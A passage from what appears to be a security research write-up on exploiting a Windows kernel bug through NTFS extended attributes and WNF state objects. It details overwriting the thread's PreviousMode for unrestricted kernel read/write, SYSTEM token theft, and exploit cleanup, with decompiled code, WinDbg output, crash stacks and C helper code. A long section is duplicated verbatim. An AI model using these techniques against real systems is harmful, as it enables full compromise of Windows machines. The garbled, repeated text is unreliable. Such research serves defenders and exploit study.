It helps to have a good understanding of how these kernel memory structure are used to understand how this works. In a massively simplified overview, the kernel mode portion of Windows contains a number of subsystems. The hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer which deals with general OS policy and operations. The kernel subsystem handles architecture specific details for low level operations and the HAL provides a abstraction layer to deal with differences between hardware.

Processes and threads are represeted at both the executive and kernel "layer" within kernel memory as _EPROCESS and _KPROCESS and _ETHREAD and _KTHREAD structures respectively.

The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."

Looking at MiReadWriteVirtualMemory which is called from NtWriteVirtualMemory we can see that if PreviousMode is not set when a user-mode thread executes, then the address validation is skipped and kernel memory space addresses can be written too:

__int64 __fastcall MiReadWriteVirtualMemory(
        HANDLE Handle,
        size_t BaseAddress,
        size_t Buffer,
        size_t NumberOfBytesToWrite,
        __int64 NumberOfBytesWritten,
        ACCESS_MASK DesiredAccess)
{
  int v7; // er13
  __int64 v9; // rsi
  struct _KTHREAD *CurrentThread; // r14
  KPROCESSOR_MODE PreviousMode; // al
  _QWORD *v12; // rbx
  __int64 v13; // rcx
  NTSTATUS v14; // edi
  _KPROCESS *Process; // r10
  PVOID v16; // r14
  int v17; // er9
  int v18; // er8
  int v19; // edx
  int v20; // ecx
  NTSTATUS v21; // eax
  int v22; // er10
  char v24; // [rsp+40h] [rbp-48h]
  __int64 v25; // [rsp+48h] [rbp-40h] BYREF
  PVOID Object[2]; // [rsp+50h] [rbp-38h] BYREF
  int v27; // [rsp+A0h] [rbp+18h]

  v27 = Buffer;
  v7 = BaseAddress;
  v9 = 0i64;
  Object[0] = 0i64;
  CurrentThread = KeGetCurrentThread();
  PreviousMode = CurrentThread->PreviousMode;
  v24 = PreviousMode;
  if ( PreviousMode )
  {
    if ( NumberOfBytesToWrite + BaseAddress < BaseAddress
      || NumberOfBytesToWrite + BaseAddress > 0x7FFFFFFF0000i64
      || Buffer + NumberOfBytesToWrite < Buffer
      || Buffer + NumberOfBytesToWrite > 0x7FFFFFFF0000i64 )
    {
      return 3221225477i64;
    }
    v12 = (_QWORD *)NumberOfBytesWritten;
    if ( NumberOfBytesWritten )
    {
      v13 = NumberOfBytesWritten;
      if ( (unsigned __int64)NumberOfBytesWritten >= 0x7FFFFFFF0000i64 )
        v13 = 0x7FFFFFFF0000i64;
      *(_QWORD *)v13 = *(_QWORD *)v13;
    }
  }

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

 dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this correct (and see we hit our breakpoint in the previous article):

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this correct (and see we hit our breakpoint in the previous article):

0: kd> !thread 0xffffd18606a54080
THREAD ffffd18606a54080  Cid 1da0.1da4  Teb: 000000ce177e0000 Win32Thread: 0000000000000000 RUNNING on processor 0
IRP List:
    ffffd18608002050: (0006,0430) Flags: 00060004  Mdl: 00000000
Not impersonating
DeviceMap                 ffffba0cc30c6630
Owning Process            ffffd186087b1300       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      2344           Ticks: 1 (0:00:00:00.015)
Context Switch Count      149            IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.015
Win32 Start Address 0x00007ff6da2c305c
Stack Init ffffd0096cdc6c90 Current ffffd0096cdc6530
Base ffffd0096cdc7000 Limit ffffd0096cdc1000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd009`6cdc62a8 fffff805`5a99bc7a : 00000000`00000000 00000000`000000d0 00000000`00000000 ffffba0c`00000000 : Ntfs!NtfsQueryEaUserEaList
ffffd009`6cdc62b0 fffff805`5a9fc8a6 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002300 ffffd186`06a54000 : Ntfs!NtfsCommonQueryEa+0x22a
ffffd009`6cdc6410 fffff805`5a9fc600 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002050 ffffd009`6cdc7000 : Ntfs!NtfsFsdDispatchSwitch+0x286
ffffd009`6cdc6540 fffff805`570d1f35 : ffffd009`6cdc68b0 fffff805`54704b46 ffffd009`6cdc7000 ffffd009`6cdc1000 : Ntfs!NtfsFsdDispatchWait+0x40
ffffd009`6cdc67e0 fffff805`54706ccf : ffffd186`02802940 ffffd186`00000030 00000000`00000000 00000000`00000000 : nt!IofCallDriver+0x55
ffffd009`6cdc6820 fffff805`547048d3 : ffffd009`6cdc68b0 00000000`00000000 00000000`00000001 ffffd186`03074bc0 : FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
ffffd009`6cdc6890 fffff805`570d1f35 : ffffd186`08002050 00000000`000000c0 00000000`000000c8 00000000`000000a4 : FLTMGR!FltpDispatch+0xa3
ffffd009`6cdc68f0 fffff805`574a6fb8 : ffffd186`08002050 00000000`00000000 00000000`00000000 fffff805`577b2094 : nt!IofCallDriver+0x55
ffffd009`6cdc6930 fffff805`57455834 : 000000ce`00000000 ffffd009`6cdc6b80 ffffd186`084eb7b0 ffffd009`6cdc6b80 : nt!IopSynchronousServiceTail+0x1a8
ffffd009`6cdc69d0 fffff805`572058b5 : ffffd186`06a54080 000000ce`178fdae8 000000ce`178feba0 00000000`000000a3 : nt!NtQueryEaFile+0x484
ffffd009`6cdc6a90 00007fff`0bfae654 : 00007ff6`da2c14dd 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd009`6cdc6b00)
000000ce`178fdac8 00007ff6`da2c14dd : 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba : ntdll!NtQueryEaFile+0x14
000000ce`178fdad0 00007ff6`da2c4490 : 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 : 0x00007ff6`da2c14dd
000000ce`178fdad8 00000000`000000a3 : 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 : 0x00007ff6`da2c4490
000000ce`178fdae0 000000ce`178fbee8 : 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 000000ce`00000017 : 0xa3
000000ce`178fdae8 0000026e`edf509ba : 00000000`00000000 000000ce`178fdba0 000000ce`00000017 00000000`00000000 : 0x000000ce`178fbee8
000000ce`178fdaf0 00000000`00000000 : 000000ce`178fdba0 000000ce`00000017 00000000`00000000 0000026e`00000001 : 0x0000026e`edf509ba

So we now know how to calculate the address of the `_KTHREAD` kernel data structure which is associated with our running exploit thread. 


At the end of stage 2 we have the following memory layout:

Stage 3 – Abusing PreviousMode

Once we have set the StateData pointer of the _WNF_NAME_INSTANCE prior to the _KPROCESS ThreadListHead Flink we can leak out the value by confusing it with the DataSize and the ChangeTimestamp, we can then calculate the FLINK as “FLINK = (uintptr_t)ChangeTimestamp << 32 | DataSize` after querying the object.

This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.

Once we have the address of the _KTHREAD we need to again find a sane value to confuse with the AllocatedSize and DataSize to allow reading and writing of PreviousMode value at offset 0x232.

In this case, pointing it into here:

   +0x220 Process          : 0xffff900f`56ef0340 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  &quot;???&quot;

Gives the following "sane" values:

dt _WNF_STATE_DATA FLINK-0x2f8+0x220

nt!_WNF_STATE_DATA
+ 0x000 Header           : _WNF_NODE_HEADER
+ 0x004 AllocatedSize : 0xffff900f
+ 0x008 DataSize : 3
+ 0x00c ChangeStamp : 0

Allowing the most significant word of the Process pointer shown above to be used as the AllocatedSize and the UserAffinity to act as the DataSize. Incidentally, we can actually influence this value used for DataSize using SetProcessAffinityMask or launching the process with start /affinity exploit.exe but for our purposes of being able to read and write PreviousMode this is fine.

Visually this looks as follows after the StateData has been modified:

This gives a 3 byte read (and up to 0xffff900f bytes write if needed – but we only need 3 bytes), of which the PreviousMode is included (i.e set to 1 before modification):

00 00 01 00 00 00 00 00  00 00 | ..........

Using the most significant word of the pointer with it always being a kernel mode address, should ensure that this is a sufficient AllocatedSize to enable overwriting PreviousMode.

Post Exploitation

Once we have set PreviousMode to 0, as mentioned above, this now gives an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful method and demonstrates how moving from an awkward to use arbitrary read/write to a better method which enables easier post exploitation and enhanced clean up options.

It is then trivial to walk the ActiveProcessLinks within the EPROCESS, obtain a pointer to a SYSTEM token and replace the existing token with this or to perform escalation by overwriting the _SEP_TOKEN_PRIVILEGES for the existing token using techniques which have been long used by Windows exploits.

Kernel Memory Cleanup

OK, so the above is good enough for a proof of concept exploit but due to the potentially large amount of memory writes needing to occur for exploit success, then it could leave the kernel in a bad state. Also, when the process terminates then certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.

This part of the exploitation process is often overlooked by proof of concept exploit writers but is often the most challenging for use in real world scenario’s (red teams / simulated attacks etc) where stability and reliability are important. Going through this process also helps understand how these types of attacks can also be detected.

This section of the blog describes some improvements which can be made in this area.

PreviousMode Restoration

On the version of Windows tested, if we try to launch a new process as SYSTEM but PreviousMode is still set to 0. Then we end up with the following crash:

```
Access violation - code c0000005 (!!! second chance !!!)
nt!PspLocateInPEManifest+0xa9:
fffff804`502f1bb5 0fba68080d      bts     dword ptr [rax+8],0Dh
0: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffff8583`c6259c90 fffff804`502f0689 : 00000195`b24ec500 00000000`00000000 00000000`00000428 00007ff6`00000000 : nt!PspLocateInPEManifest+0xa9
01 ffff8583`c6259d00 fffff804`501f19d0 : 00000000`000022aa ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspSetupUserProcessAddressSpace+0xdd
02 ffff8583`c6259db0 fffff804`5021ca6d : 00000000`00000000 ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x11a4
03 ffff8583`c625a2d0 fffff804`500058b5 : 00000000`00000002 00000000`00000001 00000000`00000000 00000195`b24ec560 : nt!NtCreateUserProcess+0x6ed
04 ffff8583`c625aa90 00007ffd`b35cd6b4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffff8583`c625ab00)
05 0000008c`c853e418 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtCreateUserProcess+0x14
```

More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.

This can be fixed simply by using our NtWriteVirtualMemory APIs to restore the PreviousMode value to 1 before launching the cmd.exe shell.

StateData Pointer Restoration

The _WNF_STATE_DATA StateData pointer is free’d when the _WNF_NAME_INSTANCE is freed on process termination (incidentially also an arbitrary free). If this is not restored to the original value, we will end up with a crash as follows:

00 ffffdc87`2a708cd8 fffff807`27912082 : ffffdc87`2a708e40 fffff807`2777b1d0 00000000`00000100 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffdc87`2a708ce0 fffff807`27911666 : 00000000`00000003 ffffdc87`2a708e40 fffff807`27808e90 00000000`0000013a : nt!KiBugCheckDebugBreak+0x12
02 ffffdc87`2a708d40 fffff807`277f3fa7 : 00000000`00000003 00000000`00000023 00000000`00000012 00000000`00000000 : nt!KeBugCheck2+0x946
03 ffffdc87`2a709450 fffff807`2798d938 : 00000000`0000013a 00000000`00000012 ffffa409`6ba02100 ffffa409`7120a000 : nt!KeBugCheckEx+0x107
04 ffffdc87`2a709490 fffff807`2798d998 : 00000000`00000012 ffffdc87`2a7095a0 ffffa409`6ba02100 fffff807`276df83e : nt!RtlpHeapHandleError+0x40
05 ffffdc87`2a7094d0 fffff807`2798d5c5 : ffffa409`7120a000 ffffa409`6ba02280 ffffa409`6ba02280 00000000`00000001 : nt!RtlpHpHeapHandleError+0x58
06 ffffdc87`2a709500 fffff807`2786667e : ffffa409`71293280 00000000`00000001 00000000`00000000 ffffa409`6f6de600 : nt!RtlpLogHeapFailure+0x45
07 ffffdc87`2a709530 fffff807`276cbc44 : 00000000`00000000 ffffb504`3b1aa7d0 00000000`00000000 ffffb504`00000000 : nt!RtlpHpVsContextFree+0x19954e
08 ffffdc87`2a7095d0 fffff807`27db2019 : 00000000`00052d20 ffffb504`33ea4600 ffffa409`712932a0 01000000`00100000 : nt!ExFreeHeapPool+0x4d4        
09 ffffdc87`2a7096b0 fffff807`27a5856b : ffffb504`00000000 ffffb504`00000000 ffffb504`3b1ab020 ffffb504`00000000 : nt!ExFreePool+0x9
0a ffffdc87`2a7096e0 fffff807`27a58329 : 00000000`00000000 ffffa409`712936d0 ffffa409`712936d0 ffffb504`00000000 : nt!ExpWnfDeleteStateData+0x8b
0b ffffdc87`2a709710 fffff807`27c46003 : ffffffff`ffffffff ffffb504`3b1ab020 ffffb504`3ab0f780 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1ed
0c ffffdc87`2a709760 fffff807`27b0553e : 00000000`00000000 ffffdc87`2a709990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0d ffffdc87`2a7097a0 fffff807`27a9ea7f : ffffa409`7129d080 ffffb504`336506a0 ffffdc87`2a709990 00000000`00000000 : nt!ExWnfExitProcess+0x32
0e ffffdc87`2a7097d0 fffff807`279f4558 : 00000000`c000013a 00000000`00000001 ffffdc87`2a7099e0 00000055`8b6d6000 : nt!PspExitThread+0x5eb
0f ffffdc87`2a7098d0 fffff807`276e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff807`276f0ee6 : nt!KiSchedulerApcTerminate+0x38
10 ffffdc87`2a709910 fffff807`277f8440 : 00000000`00000000 ffffdc87`2a7099c0 ffffdc87`2a709b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
11 ffffdc87`2a7099c0 fffff807`2780595f : ffffa409`71293000 00000251`173f2b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
12 ffffdc87`2a709b00 00007ff9`18cabe44 : 00007ff9`165d26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffdc87`2a709b00)
13 00000055`8b8ffb28 00007ff9`165d26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`18c5a800 : ntdll!NtWaitForSingleObject+0x14
14 00000055`8b8ffb30 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`18c5a800 00000000`00000000 : 0x00007ff9`165d26ee

Although we could restore this using the WNF relative read/write, as we have arbitrary read and write using the APIs, we can implement a function which uses a previously saved ScopeInstance pointer to search for the StateName of our targeted _WNF_NAME_INSTANCE object address.

Visually this looks as follows:

Some example code for this is:

/**
* This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName
* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES. 
* The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)
**/
QWORD* FindStateName(unsigned __int64 StateName)
{
    QWORD* i;
    
    // _WNF_SCOPE_INSTANCE+0x38 (NameSet)
    for (i = (QWORD*)read64((char*)BackupScopeInstance+0x38); ; i = (QWORD*)read64((char*)i + 0x8))
    {

        while (1)
        {
            if (!i)
                return 0;

            // StateName is 0x18 after the TreeLinks FLINK
            QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

            if (StateName >= CurrStateName)
                break;

            i = (QWORD*)read64(i);
        }
        QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

        if (StateName <= CurrStateName)
            break; 
    }
    return (QWORD*)((QWORD*)i - 2);
}

Then once we have obtained our _WNF_NAME_INSTANCE we can then restore the original StateData pointer.

RunRef Restoration

The next crash encountered was related to the fact that we may have corrupted many RunRef from _WNF_NAME_INSTANCE‘s in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called and an invalid value is present, we will crash as follows:

1: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffffeb0f`0e9e5bf8 fffff805`2f512082 : ffffeb0f`0e9e5d60 fffff805`2f37b1d0 00000000`00000000 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffeb0f`0e9e5c00 fffff805`2f511666 : 00000000`00000003 ffffeb0f`0e9e5d60 fffff805`2f408e90 00000000`0000003b : nt!KiBugCheckDebugBreak+0x12
02 ffffeb0f`0e9e5c60 fffff805`2f3f3fa7 : 00000000`00000103 00000000`00000000 fffff805`2f0e3838 ffffc807`cdb5e5e8 : nt!KeBugCheck2+0x946
03 ffffeb0f`0e9e6370 fffff805`2f405e69 : 00000000`0000003b 00000000`c0000005 fffff805`2f242c32 ffffeb0f`0e9e6cb0 : nt!KeBugCheckEx+0x107
04 ffffeb0f`0e9e63b0 fffff805`2f4052bc : ffffeb0f`0e9e7478 fffff805`2f0e3838 ffffeb0f`0e9e65a0 00000000`00000000 : nt!KiBugCheckDispatch+0x69
05 ffffeb0f`0e9e64f0 fffff805`2f3fcd5f : fffff805`2f405240 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceHandler+0x7c
06 ffffeb0f`0e9e6530 fffff805`2f285027 : ffffeb0f`0e9e6aa0 00000000`00000000 ffffeb0f`0e9e7b00 fffff805`2f40595f : nt!RtlpExecuteHandlerForException+0xf
07 ffffeb0f`0e9e6560 fffff805`2f283ce6 : ffffeb0f`0e9e7478 ffffeb0f`0e9e71b0 ffffeb0f`0e9e7478 ffffa300`da5eb5d8 : nt!RtlDispatchException+0x297
08 ffffeb0f`0e9e6c80 fffff805`2f405fac : ffff521f`0e9e8ad8 ffffeb0f`0e9e7560 00000000`00000000 00000000`00000000 : nt!KiDispatchException+0x186
09 ffffeb0f`0e9e7340 fffff805`2f401ce0 : 00000000`00000000 00000000`00000000 ffffffff`ffffffff ffffa300`daf84000 : nt!KiExceptionDispatch+0x12c
0a ffffeb0f`0e9e7520 fffff805`2f242c32 : ffffc807`ce062a50 fffff805`2f2df0dd ffffc807`ce062400 ffffa300`da5eb5d8 : nt!KiGeneralProtectionFault+0x320 (TrapFrame @ ffffeb0f`0e9e7520)
0b ffffeb0f`0e9e76b0 fffff805`2f2e8664 : 00000000`00000006 ffffa300`d449d8a0 ffffa300`da5eb5d8 ffffa300`db013360 : nt!ExfReleaseRundownProtection+0x32
0c ffffeb0f`0e9e76e0 fffff805`2f658318 : ffffffff`00000000 ffffa300`00000000 ffffc807`ce062a50 ffffa300`00000000 : nt!ExReleaseRundownProtection+0x24
0d ffffeb0f`0e9e7710 fffff805`2f846003 : ffffffff`ffffffff ffffa300`db013360 ffffa300`da5eb5a0 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1dc
0e ffffeb0f`0e9e7760 fffff805`2f70553e : 00000000`00000000 ffffeb0f`0e9e7990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0f ffffeb0f`0e9e77a0 fffff805`2f69ea7f : ffffc807`ce0700c0 ffffa300`d2c506a0 ffffeb0f`0e9e7990 00000000`00000000 : nt!ExWnfExitProcess+0x32
10 ffffeb0f`0e9e77d0 fffff805`2f5f4558 : 00000000`c000013a 00000000`00000001 ffffeb0f`0e9e79e0 000000f1`f98db000 : nt!PspExitThread+0x5eb
11 ffffeb0f`0e9e78d0 fffff805`2f2e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff805`2f2f0ee6 : nt!KiSchedulerApcTerminate+0x38
12 ffffeb0f`0e9e7910 fffff805`2f3f8440 : 00000000`00000000 ffffeb0f`0e9e79c0 ffffeb0f`0e9e7b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
13 ffffeb0f`0e9e79c0 fffff805`2f40595f : ffffc807`ce062400 0000020b`04f64b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
14 ffffeb0f`0e9e7b00 00007ff9`8314be44 : 00007ff9`80aa26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffeb0f`0e9e7b00)
